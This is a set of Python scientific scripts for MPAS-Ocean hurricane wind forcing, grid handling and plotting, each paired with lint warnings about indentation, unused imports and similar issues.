45 start_time = datetime.datetime.strptime(args.start_time,dtformat)
46 spinup_length = float(args.spinup_length)
47 xtime = []
48 xtime.append(args.start_time+45*' ')
49 next_time = start_time + datetime.timedelta(days=spinup_length)
50 xtime.append(datetime.datetime.strftime(next_time,dtformat)+45*' ')
51 next_time = next_time + datetime.timedelta(days=spinup_length)
52 xtime.append(datetime.datetime.strftime(next_time,dtformat)+45*' ')
53 xtime = np.array(xtime,'S64')
54 print(xtime)
55
56 # Get grid from grid file
57 grid_nc = netCDF4.Dataset(grid_file,'r')
58 lon_grid = grid_nc.variables['lonCell'][:]
59 ncells = lon_grid.size
60
61 # Initialize atmospheric forcing fields
62 u_data = np.zeros((3,ncells))
63 v_data = np.zeros((3,ncells))
64 p_data = np.zeros((3,ncells)) + 101325.0
65 print(p_data.shape)
66
67 # Write to NetCDF file
68 subprocess.call(['rm',forcing_file])
69 write_forcing_file.write_to_file(forcing_file,u_data,'windSpeedU',xtime)
70 write_forcing_file.write_to_file(forcing_file,v_data,'windSpeedV',xtime)
71 write_forcing_file.write_to_file(forcing_file,p_data,'atmosPressure',xtime)
72
| 33 - warning: bad-indentation
34 - warning: bad-indentation
35 - warning: bad-indentation
36 - warning: bad-indentation
39 - warning: bad-indentation
40 - warning: bad-indentation
44 - warning: bad-indentation
45 - warning: bad-indentation
46 - warning: bad-indentation
47 - warning: bad-indentation
48 - warning: bad-indentation
49 - warning: bad-indentation
50 - warning: bad-indentation
51 - warning: bad-indentation
52 - warning: bad-indentation
53 - warning: bad-indentation
54 - warning: bad-indentation
57 - warning: bad-indentation
58 - warning: bad-indentation
59 - warning: bad-indentation
62 - warning: bad-indentation
63 - warning: bad-indentation
64 - warning: bad-indentation
65 - warning: bad-indentation
68 - warning: bad-indentation
69 - warning: bad-indentation
70 - warning: bad-indentation
71 - warning: bad-indentation
18 - warning: unused-import
19 - warning: unused-import
21 - warning: unused-import
22 - warning: unused-import
|
1 from enum import Enum
2 import numpy as np
3 import winds.parameters as Parameters
4 import hurricane_model as Hurricane
5 import structures as Geogrid
6 import matplotlib.pyplot as plt
7 import math
8
9
10 class PROFILE_TYPE(Enum):
11 HOLLAND = 'holland'
12 WILLOUGHBY = 'willoughby'
13
14 class WindModel:
15 def __init__(self, params: Parameters, curr_hurricane: Hurricane, grid: Geogrid):
16 self.profile_type = params.wind_profile_type
17 if self.profile_type == PROFILE_TYPE.HOLLAND:
18
19 # Distance between the hurricane eye and the grid points
20 # Great circle distance in km
21 r = np.power(np.sin((grid.lat - curr_hurricane.center[1]) * 0.5), 2) + \
22 np.cos(grid.lat) * np.cos(curr_hurricane.center[1]) * \
23 np.power(np.sin((grid.lon - curr_hurricane.center[0]) * 0.5), 2)
24 r = 2.0 * params.earth_radius * np.arcsin(np.sqrt(r))
25
26 # Compute pressure
27 self.pressure_profile = holland_pressure_profile(curr_hurricane, r)
28
29 # Compute wind speed
30 self.wind_speed_profile = holland_windspeed_profile(params, curr_hurricane, r)
31
32 # plt.scatter(grid.lon, grid.lat, s=10., c=self.wind_speed_profile, alpha=1.)
33 # plt.show()
34
35 # Compute wind components
36 self.u, self.v = compute_components(self.wind_speed_profile, curr_hurricane, grid)
37
38 else:
39 raise 'Profile models other than Holland are not currently supported.'
40
41
42 def holland_pressure_profile(hurricane: Hurricane, r: np.ndarray):
43 """
44 :param hurricane: class type Hurricane
45 :param r: distance between the eye of the hurricane and the grid points in km
46 """
47 return hurricane.pcentral + hurricane.deltap * np.exp(-np.power(hurricane.extent / r ,hurricane.b))
48
49
50 def holland_windspeed_profile(params: Parameters, hurricane: Hurricane, r: np.ndarray, coriolis=False):
51 """
52 :param params: class parameters
53 :param hurricane: class Hurricane
54 :param r: distance between the eye of the hurricane and the grid points in km
55 :param coriolis: coriolis factor in rad/hrs
56 """
57
58 # Holland equation assumes:
59 # deltap in Pa
60 # density in kg/m3
61 # and returns m/s
62 units_factor = 100. # To convert the deltap from mbar to Pascals
63
64
65 y = np.power(hurricane.extent / r, hurricane.b)
66 exp_term = units_factor*(hurricane.deltap / params.rho) * hurricane.b * y * np.exp(-y)
67 if coriolis is True:
68 v = np.sqrt(exp_term + 0.25 * np.power(r * params.f, 2)) + 0.5 * r * params.f
69 else:
70 v = np.sqrt(exp_term)
71
72 v *= 3.6 # Conversion from m/s to km/h
73
74 return v
75
76 def compute_components(wind_speed_profile, curr_hurricane: Hurricane, grid: Geogrid) -> (np.ndarray, np.ndarray):
77 # Compute components of vg
78 theta = np.arctan2(grid.lat - curr_hurricane.center[1], grid.lon - curr_hurricane.center[0])
79 theta += math.pi * 0.5
80 vg_x = wind_speed_profile * np.cos(theta)
81 vg_y = wind_speed_profile * np.sin(theta)
82
83 # Compute total velocity
84 ratio = wind_speed_profile / curr_hurricane.vmax
85 u = vg_x + curr_hurricane.vforward[0] * ratio
86 v = vg_y + curr_hurricane.vforward[1] * ratio
87
88 return u, v | 43 - warning: bad-indentation
47 - warning: bad-indentation
51 - warning: bad-indentation
62 - warning: bad-indentation
65 - warning: bad-indentation
66 - warning: bad-indentation
67 - warning: bad-indentation
68 - warning: bad-indentation
69 - warning: bad-indentation
70 - warning: bad-indentation
72 - warning: bad-indentation
74 - warning: bad-indentation
39 - error: raising-bad-type
14 - refactor: too-few-public-methods
6 - warning: unused-import
|
1 from geopy.distance import geodesic
2
3 def geodistkm(x1,y1,x2,y2):
4 '''
5 Returns the geodesic distance in km given two pairs of (lon, lat) coordinates.
6 Note: Because it uses geopy, the coordinate order is reversed to (lat,lon)
7 before calling the geopy function.
8 :param x1: lon of the first point.
9 :param y1: lat of the first point.
10 :param x2: lon of the second point.
11 :param y2: lat of the second point.
12 :return: Geodesic distance between the two points in km.
13 '''
14 return geodesic((y1,x1),(y2,x2)).km
| Clean Code: No Issues Detected
|
1 import numpy as np
2 from netCDF4 import Dataset
3 import matplotlib.pyplot as plt
4 import matplotlib
5 matplotlib.use('Agg')
6
7 fig = plt.gcf()
8 nRow = 1 # 2
9 nCol = 5
10 nu = ['1', '5', '10', '100', '200']
11 iTime = [0]
12 time = ['20']
13
14 # ---nx,ny for 10 km
15 #nx = 16
16 #ny = 50
17
18 # ---nx,ny for 4 km
19 nx = 40
20 ny = 126
21
22 # ---nx,ny for 1 km
23 #nx = 160
24 #ny = 500
25
26 fig, axs = plt.subplots(nRow, nCol, figsize=(
27 2.1 * nCol, 5.0 * nRow), constrained_layout=True)
28
29 for iCol in range(nCol):
30 for iRow in range(nRow):
31 ncfile = Dataset('output_' + str(iCol + 1) + '.nc', 'r')
32 var = ncfile.variables['temperature']
33 var1 = np.reshape(var[iTime[iRow], :, 0], [ny, nx])
34 # --- flip in y-dir
35 var = np.flipud(var1)
36
37 # --- Every other row in y needs to average two neighbors in x on planar hex mesh
38 var_avg = var
39 for j in range(0, ny, 2):
40 for i in range(0, nx - 2):
41 var_avg[j, i] = (var[j, i + 1] + var[j, i]) / 2.0
42
43 if nRow == 1:
44 ax = axs[iCol]
45 if nRow > 1:
46 ax = axs[iRow, iCol]
47 dis = ax.imshow(
48 var_avg,
49 extent=[
50 0,
51 160,
52 0,
53 500],
54 cmap='jet',
55 vmin=11.8,
56 vmax=13.0)
57 ax.set_title("day " + time[iRow] + ", " + r"$\nu_h=$" + nu[iCol])
58 ax.set_xticks(np.arange(0, 161, step=40))
59 ax.set_yticks(np.arange(0, 501, step=50))
60
61 if iRow == nRow - 1:
62 ax.set_xlabel('x, km')
63 if iCol == 0:
64 ax.set_ylabel('y, km')
65 if iCol == nCol - 1:
66 if nRow == 1:
67 fig.colorbar(dis, ax=axs[nCol - 1], aspect=40)
68 if nRow > 1:
69 fig.colorbar(dis, ax=axs[iRow, nCol - 1], aspect=40)
70 ncfile.close()
71
72 if nx == 16:
73 res = '10'
74 if nx == 40:
75 res = '4'
76 if nx == 160:
77 res = '1'
78
79 plt.savefig("sections_baroclinic_channel_" + res + "km.png")
| 47 - error: possibly-used-before-assignment
79 - error: possibly-used-before-assignment
|
1 import numpy as np
2
3 class GeoGrid:
4 def __init__(self, lon: np.ndarray, lat: np.ndarray):
5 """
6 Constructor.
7 :param lon: longitude of the grid in radians, as numpy array
8 :param lat: latitude of the grid in radians, as numpy array
9 """
10 self.lon = lon
11 self.lat = lat
12 self.ncells = len(lon)
13
14
15
16
17 # '''
18 # A class that defines the structure, location, extent, and resolution of a geographic grid.
19 # The grid is not the same as a geospatial raster, but is related in that, while a raster numbers vertical cells
20 # starting from the top of the raster, the grid cells are numbered from the bottom. That is, a raster is oriented
21 # like a raster of pixels, while the geographic grid is oriented like a regular Cartesian grid of cells. The
22 # data in the grid is contained in a two-dimensional NumPy array. Because of this, the grid cell is indexed like
23 # a Fortran array (column major indexing, i.e. i=column, j=row).
24 # '''
25 # def __init__(self, lon, lat, nlon, nlat, cellsize, defaultValue=0.0):
26 # '''
27 # Constructor.
28 # :param lon: Lower-left longitude of the grid in decimal degrees.
29 # :param lat: Lower-left latitude of the grid in decimal degrees.
30 # :param nlon: The number of cells in longitude.
31 # :param nlat: The number of cells in latitude.
32 # :param cellsize: The size of a cell in the grid.
33 # '''
34 # self.lon = lon
35 # self.lat = lat
36 # self.nlon = nlon
37 # self.nlat = nlat
38 # self.cellsize = cellsize
39 # self.defaultValue = defaultValue
40 # self.grid = np.zeros([nlat,nlon],dtype=np.float64)
41 # self.bounds = [self.lon, self.lon + self.nlon*self.cellsize,
42 # self.lat, self.lat + self.nlat*self.cellsize]
43 #
44 #
45 # def put(self,i,j,v):
46 # if self.indexInside(i,j):
47 # self.grid[self.nlat-j-1,i]=v
48 #
49 # def getByIndex(self,i,j):
50 # if self.indexInside(i,j):
51 # return self.grid[self.nlat-j-1,i]
52 # else:
53 # return self.defaultValue
54 #
55 # def getByCoordinate(self,lon,lat):
56 # if self.coordinateInside(lon,lat):
57 # index = self.getIndex(lon,lat)
58 # return self.getByIndex(index[0],index[1])
59 # else:
60 # return self.defaultValue
61 #
62 # def clear(self):
63 # self.grid.fill(0.0)
64 #
65 # def indexInside(self,i,j):
66 # if i>=0 and i<self.nlon and j>=0 and j<self.nlat:
67 # return True
68 # else:
69 # return False
70 #
71 # def coordinateInside(self,lon,lat):
72 # if lon>=self.bounds[0] and lon<=self.bounds[1] and lat>=self.bounds[2] and lat<=self.bounds[3]:
73 # return True
74 # else:
75 # return False
76 #
77 # def getOrigin(self):
78 # return [self.lon,self.lat]
79 #
80 # def getCenter(self,i,j):
81 # clon = self.lon + (i+0.5)*self.cellsize
82 # clat = self.lat + (j+0.5)*self.cellsize
83 # return [clon,clat]
84 #
85 # def getIndex(self,lon,lat):
86 # i = int((lon-self.lon)/self.cellsize)
87 # j = int((lat-self.lat)/self.cellsize)
88 # return [i,j]
89 #
| 3 - refactor: too-few-public-methods
|
1 ../comparison.py | 1 - error: syntax-error
|
1 import sys
2 import numpy as np
3 import matplotlib.pyplot as plt
4 #from matplotlib.patches import Circle
5 import math
6
7 def W(x, y):
8 """Return the wind vector given a wind speed."""
9 r = np.sqrt(x*x+y*y)
10 v = V(r)
11 if r>0:
12 costheta = x/r
13 sintheta = y/r
14 return [-sintheta*v,costheta*v]
15 else:
16 return [0,0]
17
18 def V(r):
19 return 2*r*r*np.exp(-r)
20
21 def example(n):
22 # Grid of x, y points
23 nx, ny = n, n
24 x = np.linspace(-2, 2, nx)
25 y = np.linspace(-2, 2, ny)
26
27 # Wind field vector components U,V
28 U, V = np.zeros((ny, nx)), np.zeros((ny, nx))
29 for j in range(ny-1,-1,-1):
30 for i in range(0,nx):
31 vv = W(x[i],y[j])
32 U[j,i]=vv[0]
33 V[j,i]=vv[1]
34
35 fig = plt.figure()
36 ax1 = fig.add_subplot(1,1,1)
37
38 # Plot the streamlines.
39 ax1.streamplot(x, y, U, V, color=np.sqrt(U*U+V*V), cmap='Spectral')
40 ax1.set_xlabel('$x$')
41 ax1.set_ylabel('$y$')
42 ax1.set_xlim(-2,2)
43 ax1.set_ylim(-2,2)
44 ax1.set_aspect('equal')
45 plt.title('Tangential Wind Vectors')
46 plt.show()
47
48 if __name__=='__main__':
49 example(8)
50
| 11 - refactor: no-else-return
28 - warning: redefined-outer-name
1 - warning: unused-import
5 - warning: unused-import
|
1 from winds.velocities import Velocities
2 import math
3
4 def test_velocities():
5 # Forward velocity in km/hr.
6 vfe = -1.0 # Eastward .
7 vfn = 0.0 # Northward.
8 vg = 1.0 # Tangential gradient wind speed in km/hr.
9
10 veloc = Velocities(vfe,vfn)
11 r = 1.0 # Unit circle about the origin.
12 np = 360
13 dtheta = 2*math.pi/np
14 with open('test_velocities_out.csv','wt') as out:
15 out.write('x,y,vx,vy,r,theta_degrees\n')
16 for i in range(0,np):
17 theta = i*dtheta
18 degrees = 180.0*theta/math.pi
19 x = r*math.cos(theta)
20 y = r*math.sin(theta)
21 v = veloc.compute_wind_vector(vg,x,y)
22 out.write(str(x)+','+str(y)+','+str(v[0])+','+str(v[1])+','+str(r)+','+str(degrees)+'\n')
23
| 14 - warning: unspecified-encoding
|
1 import datetime
2
3 class Hurricane:
4 def __init__(self, center: tuple, extent: float, pcentral: float, deltap: float,
5 vmax: float, b: float, time: float, initial_datetime: datetime.datetime):
6 self.center = center # Position of the eye (lon,lat) in radians as tuple.
7 self.extent = extent # The maximum extent of the hurricane in kilometers.
8 self.vforward = [] # Forward velocity [ve, vn] in km/hr.
9 self.pcentral = pcentral # Central pressure in millibars.
10 self.deltap = deltap # Pressure difference in millibars.
11 self.vmax = vmax # The maximum gradient wind [ve, vn] in km/hr.
12 self.b = b # The Holland parameter, conventionally in the range [0.5,2.5]
13 self.time = time # Time of this trajectory point in hours.
14 self.ref_time = initial_datetime
15
16
17 def set_vf(self, vf: tuple):
18 self.vforward = vf
| 3 - refactor: too-many-instance-attributes
4 - refactor: too-many-arguments
4 - refactor: too-many-positional-arguments
3 - refactor: too-few-public-methods
|
1 from geopy.distance import geodesic
2 from utils.gis import geodistkm
3
4 def test_gis():
5 albuquerque = [35.0844, -106.6504] #(lat,lon)
6 los_alamos = [35.8800, -106.3031] #(lat,lon)
7
8 result1 = geodesic(albuquerque,los_alamos).km
9 result2 = geodistkm(albuquerque[1],albuquerque[0],los_alamos[1],los_alamos[0])
10
11 assert result1 == result2
| Clean Code: No Issues Detected
|
1 # /usr/bin/env python
2 """
3 % Create cell width array for this mesh on a regular latitude-longitude grid.
4 % Outputs:
5 % cellWidth - m x n array, entries are desired cell width in km
6 % lat - latitude, vector of length m, with entries between -90 and 90, degrees
7 % lon - longitude, vector of length n, with entries between -180 and 180, degrees
8 """
9 import numpy as np
10 import jigsaw_to_MPAS.mesh_definition_tools as mdt
11
12
13 def cellWidthVsLatLon():
14 lat = np.arange(-90, 90.01, 0.1)
15 lon = np.arange(-180, 180.01, 0.1)
16
17 QU1 = np.ones(lat.size)
18 EC60to30 = mdt.EC_CellWidthVsLat(lat)
19 RRS30to6 = mdt.RRS_CellWidthVsLat(lat, 30, 6)
20
21 AtlNH = RRS30to6
22 AtlGrid = mdt.mergeCellWidthVsLat(lat, EC60to30, AtlNH, 0, 4)
23
24 PacNH = mdt.mergeCellWidthVsLat(lat, 30 * QU1, RRS30to6, 50, 12)
25 PacGrid = mdt.mergeCellWidthVsLat(lat, EC60to30, PacNH, 0, 6)
26
27 cellWidth = mdt.AtlanticPacificGrid(lat, lon, AtlGrid, PacGrid)
28
29 import matplotlib.pyplot as plt
30 import matplotlib
31 matplotlib.use('Agg')
32 plt.clf()
33 plt.plot(lat, AtlGrid, label='Atlantic')
34 plt.plot(lat, PacGrid, label='Pacific')
35 plt.grid(True)
36 plt.xlabel('latitude')
37 plt.title('Grid cell size, km')
38 plt.legend()
39 plt.savefig('cellWidthVsLat.png')
40
41 return cellWidth, lon, lat
| Clean Code: No Issues Detected
|
1 #!/usr/bin/env python
2 """
3
4 Tidal channel comparison betewen MPAS-O and analytical forcing result.
5
6 Phillip J. Wolfram
7 04/12/2019
8
9 """
10
11 import numpy as np
12 import xarray as xr
13 import matplotlib.pyplot as plt
14
15 # render statically by default
16 plt.switch_backend('agg')
17
18 # analytical case
19 x = np.linspace(0,24,100)
20 y = np.sin(x*2*np.pi/24)
21 plt.plot(x,y, lw=3, color='black', label='analytical')
22
23 # data from MPAS-O on boundary
24 ds = xr.open_mfdataset('output.nc')
25 mask = ds.where(ds.yCell.values.min() == ds.yCell)
26 mask.ssh.mean('nCells').plot(marker='o', label='MPAS-O')
27
28 plt.legend()
29 plt.ylabel('ssh amplitude (m)')
30 plt.xlabel('Time (min)')
31
32 plt.savefig('tidalcomparison.png')
| Clean Code: No Issues Detected
|
1 import json
2 from netCDF4 import Dataset
3 import numpy as np
4 import math
5 from hurricane_model import hurricane
6 from structures import geogrid
7 import datetime
8
9 def read_grid_file(grid_filename: str, grid_flag: int) -> (float, float):
10 if grid_flag == 1:
11 xll, yll, cellsize, numcells_lat, numcells_lon = read_raster_inputs(grid_filename)
12 lon, lat = setup_regular_grid(xll, yll, cellsize, numcells_lat, numcells_lon)
13 else:
14 lon, lat = read_netcdf(grid_filename)
15
16 return lon, lat
17
18 def read_input_file(filename: str) -> (str, int, str, float, float):
19 try:
20 f = open(filename, "r")
21 except FileNotFoundError as fnf_error:
22 raise fnf_error
23
24 traj_filename = f.readline().rstrip('\n')
25 grid_flag = f.readline().rstrip('\n').split()
26 grid_flag = int(grid_flag[0])
27 grid_filename = f.readline().rstrip('\n')
28 ambient_pressure = f.readline().rstrip('\n').split()
29 ambient_pressure = float(ambient_pressure[0])
30 holland_b_param = f.readline().rstrip('\n').split()
31 holland_b_param = float(holland_b_param[0])
32
33 f.close()
34
35 return traj_filename, grid_flag, grid_filename, ambient_pressure, holland_b_param
36
37
38 def setup_regular_grid(xll: float, yll: float, cellsize: float, numcells_lat: int, numcells_lon: int) -> (float, float):
39 npoints = numcells_lat * numcells_lon
40 lon = np.zeros((npoints, ))
41 lat = np.zeros((npoints, ))
42 k = 0
43 for i in range(0, numcells_lon):
44 for j in range(0, numcells_lat):
45 lon[k] = xll + (float(i) + 0.5) * cellsize
46 lat[k] = yll + (float(j) + 0.5) * cellsize
47 k += 1
48
49 lat = lat * math.pi / 180. # Convert to radians
50 lon = lon * math.pi / 180. # Convert to radians
51
52 return lon, lat
53
54
55 def read_raster_inputs(filename: str) -> (float, float, float, int, int):
56 try:
57 f = open(filename, "r")
58 except FileNotFoundError as fnf_error:
59 raise fnf_error
60
61 # longitude of the south west corner in deg
62 temp = f.readline().rstrip('\n').split()
63 xll = float(temp[0])
64 # latitude of the south west corner in deg
65 temp = f.readline().rstrip('\n').split()
66 yll = float(temp[0])
67 # cell size in deg
68 temp = f.readline().rstrip('\n').split()
69 cellsize = float(temp[0])
70 # number of cells for latitude
71 temp = f.readline().rstrip('\n').split()
72 numcells_lat = int(temp[0])
73 # number of cells for longitude
74 temp = f.readline().rstrip('\n').split()
75 numcells_lon = int(temp[0])
76
77 f.close()
78
79 return xll, yll, cellsize, numcells_lat, numcells_lon
80
81
82 def read_json(filename: str):
83 try:
84 with open(filename) as json_data:
85 json_raw = json.load(json_data)
86 return json_raw
87
88 except FileNotFoundError as fnf_error:
89 raise fnf_error
90
91
92 def read_netcdf(filename: str) -> (float, float):
93 # http://unidata.github.io/netcdf4-python/#section1
94 # lat and lon from the netCDF file are assumed in radians
95 try:
96 nc = Dataset(filename)
97 temp_lat = nc.variables['latCell'][:]
98 temp_lon = nc.variables['lonCell'][:]
99
100 # Convert to numpy array for subsequent processing
101 lat = np.array(temp_lat)
102 lon = np.array(temp_lon) - 2. * math.pi
103 for i in range(0, len(lon)):
104 if lon[i] <= -math.pi:
105 lon[i] += 2. * math.pi
106
107 return lon, lat
108
109 except FileNotFoundError as fnf_error:
110 raise fnf_error
111
112
113 def initialize_hurricane(traj_filename: str, ambient_pressure: float, holland_b_param: float) -> list:
114 # JSON Specs
115 # "timeUnits": "hours",
116 # "distanceUnits": "miles",
117 # "windspeedUnits": "knots",
118 # "pressureUnits": "mb",
119
120 json_raw = read_json(traj_filename)
121
122 ref_date = datetime.datetime.strptime(json_raw['initialTime'],'%Y-%m-%d_%H:%M:%S')
123
124 curr_hurricane = []
125 traj = json_raw['stormTrack']['features']
126
127 for it in range(0, len(traj)):
128 coord = traj[it]['geometry']['coordinates']
129 center_coord = [x * math.pi / 180. for x in coord] # degree to rad
130 extent = traj[it]['properties']['rMax'] * 1.60934 # miles to km
131 pmin = traj[it]['properties']['minP'] # in mbar
132 deltap = ambient_pressure - pmin # in mbar
133 time = traj[it]['properties']['time'] # in hrs
134 vmax = traj[it]['properties']['wMax'] * 1.852 # from knots to km/h
135
136 curr_hurricane.append(hurricane.Hurricane(tuple(center_coord), extent, pmin, deltap, vmax,
137 holland_b_param, time, ref_date))
138
139 # Compute the components of the forward velocity
140 for it in range(0, len(traj) - 1):
141 x1 = curr_hurricane[it].center[0]
142 y1 = curr_hurricane[it].center[1]
143
144 x2 = curr_hurricane[it + 1].center[0]
145 y2 = curr_hurricane[it + 1].center[1]
146
147 theta = math.atan2(y2 - y1, x2 - x1)
148 vf = traj[it]['properties']['vf'] * 1.852
149 curr_hurricane[it].set_vf((vf * math.cos(theta), vf * math.sin(theta)))
150
151 return curr_hurricane
152
153
154 def initialize_grid(grid_filename: str, grid_flag: int) -> geogrid.GeoGrid:
155 lon, lat = read_grid_file(grid_filename, grid_flag)
156 return geogrid.GeoGrid(lon, lat)
| 20 - warning: unspecified-encoding
20 - refactor: consider-using-with
57 - warning: unspecified-encoding
57 - refactor: consider-using-with
84 - warning: unspecified-encoding
113 - refactor: too-many-locals
|
1 from winds.wind_model import PROFILE_TYPE
2 from winds.parameters import Parameters
3 import math
4
5 def test_parameters():
6 gridsize = [10, 10]
7 nr = 100
8 wind_profile_type = PROFILE_TYPE.HOLLAND
9 grid_position = [-106.0,35.0]
10 cellsize = 2.0
11 siderealDay = 23.934 # A sidereal day in hrs.
12 omega = 2.0 * math.pi / siderealDay # The Earth's rotation rate in rad/hr.
13 rho = 1.225e9 # Air density at sea level in kg/m^3.
14 distance_unit = 'kilometers'
15 time_unit = 'hours'
16 pressure_unit = 'millibars'
17 # The Coriolis parameter should be 2*omega*sin(pi*|phi|/360), for phi in degrees latitude [-90,90].
18
19 params = Parameters(gridsize,nr,wind_profile_type)
20
21
22
23 def eval_coriolis(lat,omega):
24 return 2*omega * math.sin(math.pi*math.fabs(lat)/360)
| 9 - warning: unused-variable
10 - warning: unused-variable
12 - warning: unused-variable
13 - warning: unused-variable
14 - warning: unused-variable
15 - warning: unused-variable
16 - warning: unused-variable
19 - warning: unused-variable
|
1 import matplotlib
2 matplotlib.use('Agg')
3 import matplotlib.pyplot as plt
4 from netCDF4 import Dataset
5 import numpy
6
7 fig = plt.gcf()
8 fig.set_size_inches(8.0,10.0)
9 nRow=1 #6
10 nCol=2
11 nu=['0.01','0.1','1','10','100','1000']
12 iTime=[3,6]
13 time=['3 hrs','6 hrs']
14 for iRow in range(nRow):
15 ncfile = Dataset('output_'+str(iRow+1)+'.nc','r')
16 var = ncfile.variables['temperature']
17 xtime = ncfile.variables['xtime']
18 for iCol in range(nCol):
19 plt.subplot(nRow, nCol, iRow*nCol+iCol+1)
20 ax = plt.imshow(var[iTime[iCol],0::4,:].T,extent=[0,200,2000,0],aspect=2)
21 plt.clim([10,20])
22 plt.jet()
23 if iRow==nRow-1:
24 plt.xlabel('x, km')
25 if iCol==0:
26 plt.ylabel('depth, m')
27 plt.colorbar()
28 #print(xtime[iTime[iCol],11:13])
29 plt.title('time='+time[iCol]+', nu='+nu[iRow])
30 ncfile.close()
31 plt.savefig('sections_overflow.png')
| 5 - warning: unused-import
|
1 import numpy
2 from netCDF4 import Dataset
3 import matplotlib.pyplot as plt
4 import matplotlib
5 matplotlib.use('Agg')
6
7 fig = plt.gcf()
8 nRow = 4
9 nCol = 2
10 nu = ['0.01', '1', '15', '150']
11 iTime = [1, 2]
12 time = ['day 10', 'day 20']
13
14 fig, axs = plt.subplots(nRow, nCol, figsize=(
15 4.0 * nCol, 3.7 * nRow), constrained_layout=True)
16
17 for iRow in range(nRow):
18 ncfile = Dataset('output_' + str(iRow + 1) + '.nc', 'r')
19 var = ncfile.variables['temperature']
20 xtime = ncfile.variables['xtime']
21 for iCol in range(nCol):
22 ax = axs[iRow, iCol]
23 dis = ax.imshow(var[iTime[iCol], 0::4, :].T, extent=[
24 0, 250, 500, 0], aspect='0.5', cmap='jet', vmin=10, vmax=20)
25 if iRow == nRow - 1:
26 ax.set_xlabel('x, km')
27 if iCol == 0:
28 ax.set_ylabel('depth, m')
29 if iCol == nCol - 1:
30 fig.colorbar(dis, ax=axs[iRow, iCol], aspect=10)
31 ax.set_title(time[iCol] + ", " + r"$\nu_h=$" + nu[iRow])
32 ncfile.close()
33
34 plt.savefig('sections_internal_waves.png')
| 1 - warning: unused-import
|
1 import netCDF4
2 import numpy as np
3 import hurricane_model as Hurricane
4 import structures as Geogrid
5 import winds_io as WindModel
6 import matplotlib.pyplot as plt
7 import datetime
8
9 def write_netcdf(filename: str, curr_hurricane: Hurricane, grid: Geogrid, winds: WindModel):
10 # http://unidata.github.io/netcdf4-python/#section1
11 rootgrp = netCDF4.Dataset(filename, "w", format="NETCDF3_64BIT_OFFSET")
12
13 # Declare dimensions
14 rootgrp.createDimension('nCells',grid.ncells)
15 rootgrp.createDimension('StrLen',64)
16 rootgrp.createDimension('Time',None)
17
18 # Declare variables
19 time = rootgrp.dimensions['Time'].name
20 ncells = rootgrp.dimensions['nCells'].name
21 time_var = rootgrp.createVariable('xtime','S1',('Time','StrLen'))
22 u_var = rootgrp.createVariable('windSpeedU',np.float64,(time,ncells))
23 v_var = rootgrp.createVariable('windSpeedV',np.float64,(time,ncells))
24 pres_var = rootgrp.createVariable('atmosPressure',np.float64,(time,ncells))
25
26 # Format time
27 ref_date = curr_hurricane[0].ref_time
28 xtime = []
29 for it in range(0,len(curr_hurricane)):
30 t = curr_hurricane[it].time
31 date = ref_date + datetime.timedelta(hours=np.float64(t))
32 xtime.append(date.strftime('%Y-%m-%d_%H:%M:%S'+45*' '))
33 xtime = np.asarray(xtime)
34 xtime_list = []
35 for t in xtime:
36 xtime_list.append(list(t))
37 time_var[:] = xtime_list
38
39 # Assign variables
40 kmh_to_mps = 0.277778
41 mbar_to_pa = 100.0
42 for it in range(0, len(curr_hurricane)-1):
43 u_var[it, :] = winds[it].u * kmh_to_mps
44 v_var[it, :] = winds[it].v * kmh_to_mps
45 pres_var[it, :] = winds[it].pressure_profile * mbar_to_pa
46
47 # Close
48 rootgrp.close()
| 30 - warning: bad-indentation
31 - warning: bad-indentation
32 - warning: bad-indentation
36 - warning: bad-indentation
9 - refactor: too-many-locals
6 - warning: unused-import
|
1 import numpy as np
2 import math
3
4 class RadialProfile():
5
6 def __init__(self,n,extent):
7 self.profile = np.zeros(n,dtype=np.float64)
8 self.rvals = np.zeros(n,dtype=np.float64)
9 self.n = n
10 self.extent = extent
11 self.dr = extent/(n-1)
12 for i in range(0,n):
13 self.rvals[i] = i*self.dr
14
15 def getValue(self,r):
16 if r<0 or r>self.extent:
17 return 0.0
18 else:
19 k = int(r/self.dr)
20 return self.rvals[k]
21
22 class PressureProfile(RadialProfile):
23 def __init__(self,n,extent,pcentral,deltap,rmax):
24 super().__init__(n,extent)
25 self.pcentral = pcentral
26 self.deltap = deltap
27 self.rmax = rmax
28
29 class HollandPressureProfile(PressureProfile):
30 def __init__(self,n,extent,pcentral,deltap,rmax,b):
31 super().__init__(n,extent,pcentral,deltap,rmax)
32 self.b = b
33 for i in range(0,self.n):
34 r = self.rvals[i]
35 if r>0:
36 p = self.pcentral + self.deltap*math.exp(-pow(self.rmax/r,b))
37 else:
38 p = pcentral
39 self.profile[i] = p
40
41 class WindSpeedProfile(RadialProfile):
42 def __init__(self,n,extent,rmax):
43 super().__init__(n,extent)
44 self.rmax = rmax
45 self.vmax = 0
46
47 def getVmax(self):
48 if self.vmax==0:
49 for i in range(0,self.n):
50 self.vmax = max(self.vmax,self.profile[i])
51 return self.vmax
52
53 class HollandWindSpeedProfile(WindSpeedProfile):
54 def __init__(self,n,extent,rmax,deltap,rho,f,b,coriolis=False):
55 super().__init__(n,extent,rmax)
56 self.units_factor = 100 # To convert the leading term to m/s
57 # This factor comes from adopting millibars instead of Pascals, and km/hr instead of m/s.
58 self.deltap = deltap
59 self.rho = rho
60 self.f = f
61 self.b = b
62 for i in range(0,self.n):
63 r = self.rvals[i]
64 if r>0:
65 y = pow(rmax/r,b)
66 exp_term = self.units_factor*(deltap/rho)*b*y*math.exp(-y)
67 if coriolis == True:
68 v = math.sqrt(exp_term + 0.25*pow(r,2)*pow(f,2))+0.5*r*f
69 else:
70 v = math.sqrt(exp_term)
71 else:
72 v = 0.0
73 self.profile[i] = v * 3.6 # to convert to km/h
| 16 - refactor: no-else-return
4 - refactor: too-few-public-methods
23 - refactor: too-many-arguments
23 - refactor: too-many-positional-arguments
22 - refactor: too-few-public-methods
30 - refactor: too-many-arguments
30 - refactor: too-many-positional-arguments
29 - refactor: too-few-public-methods
54 - refactor: too-many-arguments
54 - refactor: too-many-positional-arguments
|
1 # Author: Steven Brus
2 # Date: April, 2020
3 # Description: Plots syntetic wind/pressure timeseries on MPAS-O mesh
4
5 import netCDF4
6 import matplotlib.pyplot as plt
7 import numpy as np
8 import os
9 import cartopy
10 import cartopy.crs as ccrs
11 import cartopy.feature as cfeature
12 plt.switch_backend('agg')
13 cartopy.config['pre_existing_data_dir'] = \
14 os.getenv('CARTOPY_DIR', cartopy.config.get('pre_existing_data_dir'))
15
16 #######################################################################
17 #######################################################################
18
19 def plot_data(lon_grid,lat_grid,data,var_label,var_abrev,time):
20
21 fig = plt.figure()
